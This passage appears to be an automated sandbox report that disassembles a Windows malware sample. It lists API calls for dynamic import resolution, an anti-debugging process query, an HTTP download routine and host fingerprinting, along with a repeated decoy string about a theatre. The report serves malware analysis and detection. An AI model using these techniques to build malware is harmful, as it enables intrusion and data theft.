                                control_flow_graph 660 eb9bb0-eb9bc4 call eb9aa0 663 eb9bca-eb9dde call eb9ad0 GetProcAddress * 21 660->663 664 eb9de3-eb9e42 LoadLibraryA * 5 660->664 663->664 666 eb9e5d-eb9e64 664->666 667 eb9e44-eb9e58 GetProcAddress 664->667 668 eb9e96-eb9e9d 666->668 669 eb9e66-eb9e91 GetProcAddress * 2 666->669 667->666 671 eb9eb8-eb9ebf 668->671 672 eb9e9f-eb9eb3 GetProcAddress 668->672 669->668 673 eb9ed9-eb9ee0 671->673 674 eb9ec1-eb9ed4 GetProcAddress 671->674 672->671 675 eb9ee2-eb9f0c GetProcAddress * 2 673->675 676 eb9f11-eb9f12 673->676 674->673 675->676
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01BF3150), ref: 00EB9BF1
                                • GetProcAddress.KERNEL32(74DD0000,01BF31E0), ref: 00EB9C0A
                                • GetProcAddress.KERNEL32(74DD0000,01BF3000), ref: 00EB9C22
                                • GetProcAddress.KERNEL32(74DD0000,01BF30F0), ref: 00EB9C3A
                                • GetProcAddress.KERNEL32(74DD0000,01BF30A8), ref: 00EB9C53
                                • GetProcAddress.KERNEL32(74DD0000,01BF9E28), ref: 00EB9C6B
                                • GetProcAddress.KERNEL32(74DD0000,01BE5BB0), ref: 00EB9C83
                                • GetProcAddress.KERNEL32(74DD0000,01BE5B70), ref: 00EB9C9C
                                • GetProcAddress.KERNEL32(74DD0000,01BF3048), ref: 00EB9CB4
                                • GetProcAddress.KERNEL32(74DD0000,01BF3108), ref: 00EB9CCC
                                • GetProcAddress.KERNEL32(74DD0000,01BF3018), ref: 00EB9CE5
                                • GetProcAddress.KERNEL32(74DD0000,01BF3030), ref: 00EB9CFD
                                • GetProcAddress.KERNEL32(74DD0000,01BE5AD0), ref: 00EB9D15
                                • GetProcAddress.KERNEL32(74DD0000,01BF3240), ref: 00EB9D2E
                                • GetProcAddress.KERNEL32(74DD0000,01BF2FE8), ref: 00EB9D46
                                • GetProcAddress.KERNEL32(74DD0000,01BE5BD0), ref: 00EB9D5E
                                • GetProcAddress.KERNEL32(74DD0000,01BF3258), ref: 00EB9D77
                                • GetProcAddress.KERNEL32(74DD0000,01BF3120), ref: 00EB9D8F
                                • GetProcAddress.KERNEL32(74DD0000,01BE5C50), ref: 00EB9DA7
                                • GetProcAddress.KERNEL32(74DD0000,01BF32D0), ref: 00EB9DC0
                                • GetProcAddress.KERNEL32(74DD0000,01BE5E10), ref: 00EB9DD8
                                • LoadLibraryA.KERNEL32(01BF3348,?,00EB6CA0), ref: 00EB9DEA
                                • LoadLibraryA.KERNEL32(01BF3360,?,00EB6CA0), ref: 00EB9DFB
                                • LoadLibraryA.KERNEL32(01BF3378,?,00EB6CA0), ref: 00EB9E0D
                                • LoadLibraryA.KERNEL32(01BF33A8,?,00EB6CA0), ref: 00EB9E1F
                                • LoadLibraryA.KERNEL32(01BF3300,?,00EB6CA0), ref: 00EB9E30
                                • GetProcAddress.KERNEL32(75A70000,01BF3330), ref: 00EB9E52
                                • GetProcAddress.KERNEL32(75290000,01BF3318), ref: 00EB9E73
                                • GetProcAddress.KERNEL32(75290000,01BF3390), ref: 00EB9E8B
                                • GetProcAddress.KERNEL32(75BD0000,01BF32E8), ref: 00EB9EAD
                                • GetProcAddress.KERNEL32(75450000,01BE5E30), ref: 00EB9ECE
                                • GetProcAddress.KERNEL32(76E90000,01BF9CD8), ref: 00EB9EEF
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00EB9F06
                                Strings
                                • NtQueryInformationProcess, xrefs: 00EB9EFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 19269057dace6d74ba93d249f00e1f78d899d621e7e92931c0210ad2d1f37ccf
                                • Instruction ID: 2b41215c7f2fdcdab608c7fd495b3a965d5a76bf2edcfc7ceb2e137a8c917675
                                • Opcode Fuzzy Hash: 19269057dace6d74ba93d249f00e1f78d899d621e7e92931c0210ad2d1f37ccf
                                • Instruction Fuzzy Hash: 86A1FEB55146009FD36CDFA9F88C96677BAA74D701B10893AF539C33A8EA7495C0CF60
                                Function 00EA4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 ea4610-ea46e5 RtlAllocateHeap 781 ea46f0-ea46f6 764->781 782 ea479f-ea47f9 VirtualProtect 781->782 783 ea46fc-ea479a 781->783 783->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA465E
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EA47EC
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA47C0
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4693
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA46D3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA46B2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA479F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4784
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA46A7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4667
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA46FC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA47B5
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4672
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4707
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4712
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA471D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA467D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4688
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA478F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA47CB
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4763
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA47AA
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA46C8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4728
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA46BD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA476E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EA4779
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 74b06c01683802eacb3bee9e88f55bded602d870c7662574519a84b99c168779
                                • Instruction ID: 947287d428edbe786ed3460abf197c43e78879f6ebcc2a238956ef7bb5d76a31
                                • Opcode Fuzzy Hash: 74b06c01683802eacb3bee9e88f55bded602d870c7662574519a84b99c168779
                                • Instruction Fuzzy Hash: D641EF637C2744EEC729FBA48A4EF9D76665FC6700F507048A81076280FBF2768347A6
                                Function 00EA62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 ea62d0-ea635b call ebaab0 call ea4800 call ebaa50 InternetOpenA StrCmpCA 1040 ea635d 1033->1040 1041 ea6364-ea6368 1033->1041 1040->1041 1042 ea6559-ea6575 call ebaab0 call ebab10 * 2 1041->1042 1043 ea636e-ea6392 InternetConnectA 1041->1043 1061 ea6578-ea657d 1042->1061 1044 ea6398-ea639c 1043->1044 1045 ea654f-ea6553 InternetCloseHandle 1043->1045 1047 ea63aa 1044->1047 1048 ea639e-ea63a8 1044->1048 1045->1042 1050 ea63b4-ea63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 ea63e8-ea63ec 1050->1052 1053 ea6545-ea6549 InternetCloseHandle 1050->1053 1056 ea63ee-ea640f InternetSetOptionA 1052->1056 1057 ea6415-ea6455 HttpSendRequestA HttpQueryInfoA 1052->1057 1053->1045 1056->1057 1059 ea647c-ea649b call eb8ad0 1057->1059 1060 ea6457-ea6477 call ebaa50 call ebab10 * 2 1057->1060 1066 ea6519-ea6539 call ebaa50 call ebab10 * 2 1059->1066 1067 ea649d-ea64a4 1059->1067 1060->1061 1066->1061 1070 ea64a6-ea64d0 InternetReadFile 1067->1070 1071 ea6517-ea653f InternetCloseHandle 1067->1071 1076 ea64db 1070->1076 1077 ea64d2-ea64d9 1070->1077 1071->1053 1076->1071 1077->1076 1080 ea64dd-ea6515 call ebacc0 call ebabb0 call ebab10 1077->1080 1080->1070
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                  • Part of subcall function 00EA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • InternetOpenA.WININET(00EC0DFF,00000001,00000000,00000000,00000000), ref: 00EA6331
                                • StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA6353
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA6385
                                • HttpOpenRequestA.WININET(00000000,GET,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA63D5
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EA640F
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA6421
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EA644D
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EA64BD
                                • InternetCloseHandle.WININET(00000000), ref: 00EA653F
                                • InternetCloseHandle.WININET(00000000), ref: 00EA6549
                                • InternetCloseHandle.WININET(00000000), ref: 00EA6553
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 60236f361922bda665a52e45a881589c18a3fedecb160f1402cbaec1006e87ef
                                • Instruction ID: 5933508bcda276b3f974bb02aaf6c8f1d5ad42a9bd2054eefa9f2609a34f988f
                                • Opcode Fuzzy Hash: 60236f361922bda665a52e45a881589c18a3fedecb160f1402cbaec1006e87ef
                                • Instruction Fuzzy Hash: 58715C71A00218ABDF24DB90DC99FEE77B5BB49700F1494A8F11A7B1C4DBB16A84CF51
                                Function 00EB7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 eb7690-eb76da GetWindowsDirectoryA 1357 eb76dc 1356->1357 1358 eb76e3-eb7757 GetVolumeInformationA call eb8e90 * 3 1356->1358 1357->1358 1365 eb7768-eb776f 1358->1365 1366 eb778c-eb77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 eb7771-eb778a call eb8e90 1365->1367 1369 eb77a9-eb77b6 call ebaa50 1366->1369 1370 eb77b8-eb77e8 wsprintfA call ebaa50 1366->1370 1367->1365 1377 eb780e-eb781e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EB76D2
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EB770F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7793
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB779A
                                • wsprintfA.USER32 ref: 00EB77D0
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: eb963edc84e65f59d0c01af92562cfb2b594dce1aa124e2620196071e6d3cdfb
                                • Instruction ID: 6bca4a28a59e92b16da4132e7225fb26fabd03e479154052ee883807de3bd9d2
                                • Opcode Fuzzy Hash: eb963edc84e65f59d0c01af92562cfb2b594dce1aa124e2620196071e6d3cdfb
                                • Instruction Fuzzy Hash: 834182B1D04358ABDB14DB94DC45BDEBBB8AF48704F1050A9F609BB280D774AA84CBA5
                                Function 00EB79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EA11B7), ref: 00EB7A10
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7A17
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EB7A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: b0ed1d6703b2193bc0606ac5151ab252298b1ace6e82b2132315adf0b701ce70
                                • Instruction ID: 7a1cb9322a05c9d23b79a13eca36a1bf6eddfc41fad4b66308b8d006a7e17a4a
                                • Opcode Fuzzy Hash: b0ed1d6703b2193bc0606ac5151ab252298b1ace6e82b2132315adf0b701ce70
                                • Instruction Fuzzy Hash: 00F04FB1944309EBC714DF98DD49BAEBBB8EB45711F10022AF625A2780C7755540CBA1
                                Function 00EA1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
